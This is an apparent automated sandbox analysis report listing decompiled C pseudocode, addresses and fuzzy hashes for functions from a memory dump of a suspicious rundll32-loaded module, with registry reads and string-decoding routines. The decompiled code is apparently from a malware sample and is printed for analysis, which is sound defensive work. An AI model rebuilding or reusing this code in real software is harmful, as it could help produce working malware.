                                                                                                                                                                                                                                    0x031b3da8

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 5fcd8103437dea3a918481c009f0c189b8672dc633c579473a60c5995b8b3d12
                                                                                                                                                                                                                                    • Instruction ID: 1c1bf303bfb321704ef152462750934efb4406048da632ec8b839b866b00b989
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fcd8103437dea3a918481c009f0c189b8672dc633c579473a60c5995b8b3d12
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38113A799002446FDF28EEB5DC407EEBBB8AB4C394F850D7ED560DA180E370C5958A10
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B6A56, Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E031B6A56(intOrPtr __eax, void* __ecx, signed int __edx, intOrPtr _a4) {
				unsigned int _v24;
				signed int _v28;
				void* _t11;
				unsigned int* _t12;
				signed int _t14;
				void* _t16;
				signed int _t17;
				unsigned int _t21;
				signed int _t24;
				void* _t25;
				void* _t28;
				signed int _t31;

				_t24 = __edx;
				__imp__(0, 0x400000, 0, _t25, _t28, __ecx, __ecx); // executed
				 *0x31bd238 = __eax;
				if(__eax != 0) {
					__imp__();
					E031BD1A8 = __eax;
					_t11 = E031B8F10(__eax, _a4);
					if(_t11 == 0) {
						do {
							_t12 =  &_v24;
							__imp__(_t12);
							__imp__();
							_t21 = _v24;
							_t14 = (_t21 << 0x00000020 | _v28) >> 7;
							L031BB226();
							_t31 = _t12 + _t14;
							_t16 = E031B7E03(_a4, _t31);
							_t17 = 2;
							_t23 = _t31;
							__imp__(_t17 << _t31, _t14, _t21 >> 7, 9, 0); // executed
						} while (_t16 == 1);
						if(E031B6B96(_t23) != 0) {
							 *0x31bd260 = 1; // executed
						}
						_t11 = E031B225B(_t24); // executed
					}
				} else {
					_t11 = 8;
				}
				return _t11;
			}















                                                                                                                                                                                                                                    0x031b6a56
                                                                                                                                                                                                                                    0x031b6a69
                                                                                                                                                                                                                                    0x031b6a71
                                                                                                                                                                                                                                    0x031b6a76
                                                                                                                                                                                                                                    0x031b6a7d
                                                                                                                                                                                                                                    0x031b6a86
                                                                                                                                                                                                                                    0x031b6a8b
                                                                                                                                                                                                                                    0x031b6a92
                                                                                                                                                                                                                                    0x031b6a94
                                                                                                                                                                                                                                    0x031b6a94
                                                                                                                                                                                                                                    0x031b6a99
                                                                                                                                                                                                                                    0x031b6a9f
                                                                                                                                                                                                                                    0x031b6aa5
                                                                                                                                                                                                                                    0x031b6aaf
                                                                                                                                                                                                                                    0x031b6abc
                                                                                                                                                                                                                                    0x031b6ac1
                                                                                                                                                                                                                                    0x031b6ac7
                                                                                                                                                                                                                                    0x031b6ad0
                                                                                                                                                                                                                                    0x031b6ad1
                                                                                                                                                                                                                                    0x031b6ad6
                                                                                                                                                                                                                                    0x031b6adc
                                                                                                                                                                                                                                    0x031b6ae8
                                                                                                                                                                                                                                    0x031b6aea
                                                                                                                                                                                                                                    0x031b6aea
                                                                                                                                                                                                                                    0x031b6af4
                                                                                                                                                                                                                                    0x031b6af4
                                                                                                                                                                                                                                    0x031b6a78
                                                                                                                                                                                                                                    0x031b6a7a
                                                                                                                                                                                                                                    0x031b6a7a
                                                                                                                                                                                                                                    0x031b6afe

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 5a9a643f767d2c73816c4d81834db673dff0841745e0ef13d14ad401d85b9b97
                                                                                                                                                                                                                                    • Instruction ID: 1bada41adc1a81fc016c71634384abf8efbccd03408b91d47b0d6f79f5c9f322
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a9a643f767d2c73816c4d81834db673dff0841745e0ef13d14ad401d85b9b97
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE11827A744300AFE728FB74EC49BAA76BD9B8C750F144529FA45CA1C4FBB0D48086B1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B94A9, Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 913edace7791badd2d0fae7f57eb849541f25a4a0f8829a657f6b1c0ece41164
                                                                                                                                                                                                                                    • Instruction ID: e3492671ec63c3e56ac3c4ecdea8a1c217c4aac6736a542b9efffb5376b0991e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 913edace7791badd2d0fae7f57eb849541f25a4a0f8829a657f6b1c0ece41164
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3301B5716453215FD234DE699C49F6BBABCEB8D650F160559F991D7240DB60C80286A0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B21CD, Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                                                                                                    			E031B21CD(void* __ecx, signed char* _a4) {
				char _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t18;
				signed short* _t21;
				void* _t23;
				intOrPtr* _t26;

				_t23 = 0;
				_push(0);
				_t18 = 1;
				_t26 = 0x31bd330;
				E031B84D5();
				while(1) {
					_t8 = E031B12D4(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E031B809F(_t14);
					if(_t15 == 0) {
						__imp__( *0x31bd238, 0, _v8);
						break;
					} else {
						 *_t26 = _t15;
						_t26 = _t26 + 4;
						_t23 = _t23 + 1;
						if(_t23 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E031B84D5();
					if(_t18 != 0) {
						_t21 =  *0x31bd338; // 0x5169b70
						_t11 =  *_t21 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t21 = _t12;
					}
					return _t18;
				}
				_t18 = 0;
				goto L7;
			}













                                                                                                                                                                                                                                    0x031b21d5
                                                                                                                                                                                                                                    0x031b21d9
                                                                                                                                                                                                                                    0x031b21da
                                                                                                                                                                                                                                    0x031b21db
                                                                                                                                                                                                                                    0x031b21e0
                                                                                                                                                                                                                                    0x031b21e5
                                                                                                                                                                                                                                    0x031b21ec
                                                                                                                                                                                                                                    0x031b21f3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b21f5
                                                                                                                                                                                                                                    0x031b21fa
                                                                                                                                                                                                                                    0x031b21fb
                                                                                                                                                                                                                                    0x031b2202
                                                                                                                                                                                                                                    0x031b221c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b2204
                                                                                                                                                                                                                                    0x031b2204
                                                                                                                                                                                                                                    0x031b2206
                                                                                                                                                                                                                                    0x031b2209
                                                                                                                                                                                                                                    0x031b220d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031b220f
                                                                                                                                                                                                                                    0x031b220d
                                                                                                                                                                                                                                    0x031b2224
                                                                                                                                                                                                                                    0x031b2224
                                                                                                                                                                                                                                    0x031b2226
                                                                                                                                                                                                                                    0x031b222d
                                                                                                                                                                                                                                    0x031b222f
                                                                                                                                                                                                                                    0x031b2235
                                                                                                                                                                                                                                    0x031b223c
                                                                                                                                                                                                                                    0x031b224c
                                                                                                                                                                                                                                    0x031b2244
                                                                                                                                                                                                                                    0x031b2247
                                                                                                                                                                                                                                    0x031b2247
                                                                                                                                                                                                                                    0x031b224f
                                                                                                                                                                                                                                    0x031b224f
                                                                                                                                                                                                                                    0x031b2258
                                                                                                                                                                                                                                    0x031b2258
                                                                                                                                                                                                                                    0x031b2222
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 67ed4cdb56018e0e49240e46803ec6868f2d322d3750d235b296922f9836dfe3
                                                                                                                                                                                                                                    • Instruction ID: a61f2b1bb3178150b703c9b7bebaa5d82b4efc3fab52564ac549eb17f51e6183
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67ed4cdb56018e0e49240e46803ec6868f2d322d3750d235b296922f9836dfe3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E012D396002086BE704EEEADC80FEAB2B9EB4D664F540475F9C4D6154DB75DC869330
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031BA72D, Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E031BA72D(intOrPtr _a4, intOrPtr* _a8) {
				void* _t9;
				void* _t11;
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr* _t17;
				intOrPtr* _t19;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr* _t28;

				_t28 = E031B2049(_t9, 8);
				if(_t28 == 0) {
					_t11 = 8;
					return _t11;
				}
				_t12 =  *0x31bd27c; // 0x1faa5a8
				_t2 = _t12 + 0x31be1bc; // 0x6f0072
				_t14 = E031B7B5D(_t2, _a4, _t28); // executed
				_t27 = _t14;
				if(_t27 < 0) {
					L6:
					E031B9039(_t14, _t28);
					return _t27;
				}
				_t17 =  *_t28;
				_t3 = _t28 + 4; // 0x4
				_t25 =  *0x31bd27c; // 0x1faa5a8
				_t4 = _t25 + 0x31be1fc; // 0x740053
				_t27 =  *((intOrPtr*)( *_t17 + 0x18))(_t17, _t4, 0, 0, _t3, 0);
				if(_t27 < 0) {
					_t19 =  *_t28;
					 *((intOrPtr*)( *_t19 + 8))(_t19);
					_t14 = _a4;
				} else {
					_t14 = 0;
					 *_a8 = _t28;
				}
				if(_t27 < 0) {
					goto L6;
				}
				return _t14;
			}












                                                                                                                                                                                                                                    0x031ba739
                                                                                                                                                                                                                                    0x031ba73d
                                                                                                                                                                                                                                    0x031ba7a3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031ba7a3
                                                                                                                                                                                                                                    0x031ba73f
                                                                                                                                                                                                                                    0x031ba748
                                                                                                                                                                                                                                    0x031ba74f
                                                                                                                                                                                                                                    0x031ba754
                                                                                                                                                                                                                                    0x031ba758
                                                                                                                                                                                                                                    0x031ba797
                                                                                                                                                                                                                                    0x031ba798
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031ba79d
                                                                                                                                                                                                                                    0x031ba75a
                                                                                                                                                                                                                                    0x031ba760
                                                                                                                                                                                                                                    0x031ba764
                                                                                                                                                                                                                                    0x031ba76e
                                                                                                                                                                                                                                    0x031ba779
                                                                                                                                                                                                                                    0x031ba77d
                                                                                                                                                                                                                                    0x031ba788
                                                                                                                                                                                                                                    0x031ba78d
                                                                                                                                                                                                                                    0x031ba790
                                                                                                                                                                                                                                    0x031ba77f
                                                                                                                                                                                                                                    0x031ba782
                                                                                                                                                                                                                                    0x031ba784
                                                                                                                                                                                                                                    0x031ba784
                                                                                                                                                                                                                                    0x031ba795
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x031ba7a7

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 56d6365d588b4be538d8e81eb487b7b0183147a4375841194646903bda7d03bb
                                                                                                                                                                                                                                    • Instruction ID: 8c13f0099580e51735e7f12621cf4d153b485ad7605f054ee6a5b9ef0eff6a20
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56d6365d588b4be538d8e81eb487b7b0183147a4375841194646903bda7d03bb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A01803A204604ABC711DEA9D894F96B7BAEFCD750F218469F558CF240DB72D802C7A0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B9318, Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 34%
                                                                                                                                                                                                                                    			E031B9318(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x31bd27c; // 0x1faa5a8
				_t4 = _t15 + 0x31be39c; // 0x5168944
				_t20 = _t4;
				_t6 = _t15 + 0x31be124; // 0x650047
				_t17 = E031B9152(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E031B9FC9(_t17, _t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                                                                                                                                                                                                                    0x031b9322
                                                                                                                                                                                                                                    0x031b9324
                                                                                                                                                                                                                                    0x031b932b
                                                                                                                                                                                                                                    0x031b932c
                                                                                                                                                                                                                                    0x031b932d
                                                                                                                                                                                                                                    0x031b932e
                                                                                                                                                                                                                                    0x031b9334
                                                                                                                                                                                                                                    0x031b9339
                                                                                                                                                                                                                                    0x031b9339
                                                                                                                                                                                                                                    0x031b9343
                                                                                                                                                                                                                                    0x031b9355
                                                                                                                                                                                                                                    0x031b935c
                                                                                                                                                                                                                                    0x031b938b
                                                                                                                                                                                                                                    0x031b935e
                                                                                                                                                                                                                                    0x031b9363
                                                                                                                                                                                                                                    0x031b9388
                                                                                                                                                                                                                                    0x031b9365
                                                                                                                                                                                                                                    0x031b9368
                                                                                                                                                                                                                                    0x031b936f
                                                                                                                                                                                                                                    0x031b937a
                                                                                                                                                                                                                                    0x031b9371
                                                                                                                                                                                                                                    0x031b9374
                                                                                                                                                                                                                                    0x031b9374
                                                                                                                                                                                                                                    0x031b937e
                                                                                                                                                                                                                                    0x031b937e
                                                                                                                                                                                                                                    0x031b9363
                                                                                                                                                                                                                                    0x031b9392

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 8f4cb19d20bb2ae54b4beff4393387ac8bc826ca565ce7d272eb5cc8dad47086
                                                                                                                                                                                                                                    • Instruction ID: 66f8a756c81106556f2cab4349e3f7630630c3f0f468b70b3a5e90ff7e213990
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f4cb19d20bb2ae54b4beff4393387ac8bc826ca565ce7d272eb5cc8dad47086
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC019E36500119BBCB15EFB8DC44CEEBBB9FB4C710B014925EA11EA1B0D370999687B1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B1262, Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                                                    			E031B1262(intOrPtr* __esi, intOrPtr _a4, unsigned int _a8, char _a12) {
				signed short _t18;
				intOrPtr _t23;
				signed int _t25;
				signed short _t26;

				if(_a4 != 0) {
					_t18 = E031B9318(_a4, _a8, _a12, __esi); // executed
					_t26 = _t18;
				} else {
					_t26 = E031B6BFA(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t26 == 0) {
						_t25 = _a8 >> 1;
						if(_t25 == 0) {
							_t26 = 2;
							__imp__( *0x31bd238, 0, _a12);
						} else {
							_t23 = _a12;
							 *(_t23 + _t25 * 2 - 2) =  *(_t23 + _t25 * 2 - 2) & _t26;
							 *__esi = _t23;
						}
					}
				}
				return _t26;
			}







                                                                                                                                                                                                                                    0x031b126a
                                                                                                                                                                                                                                    0x031b12bf
                                                                                                                                                                                                                                    0x031b12c4
                                                                                                                                                                                                                                    0x031b126c
                                                                                                                                                                                                                                    0x031b1286
                                                                                                                                                                                                                                    0x031b128a
                                                                                                                                                                                                                                    0x031b128f
                                                                                                                                                                                                                                    0x031b1291
                                                                                                                                                                                                                                    0x031b12a1
                                                                                                                                                                                                                                    0x031b12ad
                                                                                                                                                                                                                                    0x031b1293
                                                                                                                                                                                                                                    0x031b1293
                                                                                                                                                                                                                                    0x031b1296
                                                                                                                                                                                                                                    0x031b129b
                                                                                                                                                                                                                                    0x031b129b
                                                                                                                                                                                                                                    0x031b1291
                                                                                                                                                                                                                                    0x031b128a
                                                                                                                                                                                                                                    0x031b12ca

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 71cd8301f6a5b0ec3faea09413f35d4775d09b8393a27a7c54ee404949a0116d
                                                                                                                                                                                                                                    • Instruction ID: f1b43fb387bd0f980751278f6139d41780db6b3d7242ed24b758647229300a66
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71cd8301f6a5b0ec3faea09413f35d4775d09b8393a27a7c54ee404949a0116d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83016D36100249FBCB16DF84CC11FEA3BBAFB8C360F268469FA558A160D731D461CB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B54BC, Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E031B54BC(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__; // 0x76d24a00
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E031B2049(_t10 + 1, _t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E031B9039(_t15, _t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                                                                                                                                                                                                                    0x031b54c1
                                                                                                                                                                                                                                    0x031b54cc
                                                                                                                                                                                                                                    0x031b54ce
                                                                                                                                                                                                                                    0x031b54d4
                                                                                                                                                                                                                                    0x031b54d6
                                                                                                                                                                                                                                    0x031b54db
                                                                                                                                                                                                                                    0x031b54e4
                                                                                                                                                                                                                                    0x031b54e8
                                                                                                                                                                                                                                    0x031b54f1
                                                                                                                                                                                                                                    0x031b54f5
                                                                                                                                                                                                                                    0x031b5504
                                                                                                                                                                                                                                    0x031b54f7
                                                                                                                                                                                                                                    0x031b54f8
                                                                                                                                                                                                                                    0x031b54fd
                                                                                                                                                                                                                                    0x031b54fd
                                                                                                                                                                                                                                    0x031b54f5
                                                                                                                                                                                                                                    0x031b54e8
                                                                                                                                                                                                                                    0x031b550d

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: ef45bdc2291adbb93cccd374a0c4bca689bda76b33c5874b31b9885225c40251
                                                                                                                                                                                                                                    • Instruction ID: dfb49921c3fac6645dc9fee09d512c931505c717f283a1eb0549c564367320b5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef45bdc2291adbb93cccd374a0c4bca689bda76b33c5874b31b9885225c40251
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5F05E26600209BBEB11D7AA9C40EEF76BEDBCE651F190069E904D7140EB70DE0287B0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 031B96A4, Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E031B96A4(void* __ecx) {
				signed int _v8;
				char _v12;
				void* _t10;
				void* _t12;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t23;

				_t10 =  *0x31bd270; // 0xd448b889
				_v8 = _t10;
				_v12 = _t10;
				_t23 = 0; // executed
				_t12 = E031B21CD(__ecx,  &_v12); // executed
				if(_t12 != 0) {
					_t14 =  *0x31bd27c; // 0x1faa5a8
					_t4 = _t14 + 0x31be796; // 0x74666f53
					_t17 = E031B7A9A(_t4, 0);
					 *0x31bd33c = _t17;
					if(_t17 != 0) {
						_t18 =  *0x31bd27c; // 0x1faa5a8
						_v8 = _v8 ^ 0x738bb12a;
						_t8 = _t18 + 0x31be862; // 0x61636f4c
						_t21 = E031B7A9A(_t8, 1);
						 *0x31bd344 = _t21;
						if(_t21 != 0) {
							_t23 = 1;
						}
					}
				}
				return _t23;
			}












                                                                                                                                                                                                                                    0x031b96aa
                                                                                                                                                                                                                                    0x031b96b0
                                                                                                                                                                                                                                    0x031b96b3
                                                                                                                                                                                                                                    0x031b96ba
                                                                                                                                                                                                                                    0x031b96bc
                                                                                                                                                                                                                                    0x031b96c3
                                                                                                                                                                                                                                    0x031b96c5
                                                                                                                                                                                                                                    0x031b96ca
                                                                                                                                                                                                                                    0x031b96d5
                                                                                                                                                                                                                                    0x031b96dc
                                                                                                                                                                                                                                    0x031b96e1
                                                                                                                                                                                                                                    0x031b96e3
                                                                                                                                                                                                                                    0x031b96e8
                                                                                                                                                                                                                                    0x031b96ef
                                                                                                                                                                                                                                    0x031b96fb
                                                                                                                                                                                                                                    0x031b9702
                                                                                                                                                                                                                                    0x031b9707
                                                                                                                                                                                                                                    0x031b9709
                                                                                                                                                                                                                                    0x031b9709
                                                                                                                                                                                                                                    0x031b9707
